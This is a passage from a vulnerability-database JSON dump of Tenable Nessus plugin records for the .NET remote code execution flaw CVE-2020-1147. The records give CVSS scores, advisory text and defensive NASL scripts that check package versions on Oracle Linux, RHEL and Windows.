etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:37:49", "description": "From Red Hat Security Advisory 2020:2938 :\n\nThe remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2938 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-20T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : .NET / Core (ELSA-2020-2938)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dotnet-host-fxr-2.1", "p-cpe:/a:oracle:linux:dotnet-runtime-2.1", "p-cpe:/a:oracle:linux:dotnet-sdk-2.1", "p-cpe:/a:oracle:linux:dotnet-sdk-2.1.5xx", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2020-2938.NASL", "href": "https://www.tenable.com/plugins/nessus/138660", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2938 and \n# Oracle Linux Security Advisory ELSA-2020-2938 respectively.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138660);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2938\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle Linux 8 : .NET / Core (ELSA-2020-2938)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2020:2938 :\n\nThe remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2938 advisory.\n\n - dotnet: XML source markup processing remote code\n execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2020-July/010130.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected .net and / or core packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-host-fxr-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-runtime-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-sdk-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dotnet-sdk-2.1.5xx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-host-fxr-2.1-2.1.20-1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-runtime-2.1-2.1.20-1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-sdk-2.1-2.1.516-1.el8_2\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"dotnet-sdk-2.1.5xx-2.1.516-1.el8_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dotnet-host-fxr-2.1 / dotnet-runtime-2.1 / dotnet-sdk-2.1 / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:37:50", "description": "The Microsoft .NET Core SDK installation on the remote host is version 2.1.x < 2.1.516 / 2.1.613 / 2.1.808, or 3.1.x < 3.1.106 / 3.1.302. It is, therefore, affected by a remote code execution vulnerabilty. It is, therefore, affected by a remote code execution (RCE) vulnerability due to failing to check the source markup of XML file input. An unauthenticated, remote attacker can exploit this, by issuing specially crafted requests to applications that process certain types of XML, to execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "Security Update for .NET Core SDK (July 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_core"], "id": "SMB_NT_MS20_JUL_DOTNET_CORE_SDK.NASL", "href": "https://www.tenable.com/plugins/nessus/138466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138466);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Security Update for .NET Core SDK (July 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a .NET Core SDK remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Core SDK installation on the remote host is version 2.1.x < 2.1.516 / 2.1.613 / 2.1.808, or\n3.1.x < 3.1.106 / 3.1.302. It is, therefore, affected by a remote code execution vulnerabilty. It is, therefore,\naffected by a remote code execution (RCE) vulnerability due to failing to check the source markup of XML file input. An\nunauthenticated, remote attacker can exploit this, by issuing specially crafted requests to applications that process\ncertain types of XML, to execute arbitrary code in the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://dotnet.microsoft.com/download/dotnet-core/3.1\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43ad1c2a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/159\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to vendor documentation.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_core\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_dotnet_core_sdk_win.nbin\");\n script_require_keys(\"installed_sw/.NET Core SDK Windows\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = '.NET Core SDK Windows';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '2.1', 'fixed_version' : '2.1.516' },\n { 'min_version' : '2.1.600', 'fixed_version' : '2.1.613' },\n { 'min_version' : '2.1.800', 'fixed_version' : '2.1.808' },\n { 'min_version' : '3.1', 'fixed_version' : '3.1.106' },\n { 'min_version' : '3.1.200', 'fixed_version' : '3.1.302' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:24:31", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2939 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "nessus", "title": "RHEL 7 : .NET Core 3.1 on Red Hat Enterprise Linux (RHSA-2020:2939)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-aspnetcore-runtime-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-aspnetcore-targeting-pack-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-apphost-pack-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-host", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-hostfxr-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-runtime-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-sdk-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-targeting-pack-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-templates-3.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-netstandard-targeting-pack-2.1"], "id": "REDHAT-RHSA-2020-2939.NASL", "href": "https://www.tenable.com/plugins/nessus/138505", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2939. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138505);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2939\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n\n script_name(english:\"RHEL 7 : .NET Core 3.1 on Red Hat Enterprise Linux (RHSA-2020:2939)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2939 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1856929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-aspnetcore-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-aspnetcore-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-apphost-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-hostfxr-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-runtime-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-sdk-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-targeting-pack-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-dotnet-templates-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet31-netstandard-targeting-pack-2.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/dotnet/1/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/dotnet/1/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/dotnet/1/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/dotnet/1/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/dotnet/1/os',\n 'content/dist/rhel/server/7/7Server/x86_64/dotnet/1/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/dotnet/1/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/dotnet/1/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/dotnet/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'rh-dotnet31-aspnetcore-runtime-3.1-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-3.1.106-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-apphost-pack-3.1-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-host-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-hostfxr-3.1-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-runtime-3.1-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-sdk-3.1-3.1.106-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-targeting-pack-3.1-3.1.6-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-dotnet-templates-3.1-3.1.106-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'},\n {'reference':'rh-dotnet31-netstandard-targeting-pack-2.1-3.1.106-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet31'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'rh-dotnet31-aspnetcore-runtime-3.1 / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:25:59", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2989 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-17T00:00:00", "type": "nessus", "title": "RHEL 8 : .NET Core (RHSA-2020:2989)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:8.0", "p-cpe:/a:redhat:enterprise_linux:dotnet", "p-cpe:/a:redhat:enterprise_linux:dotnet-host", 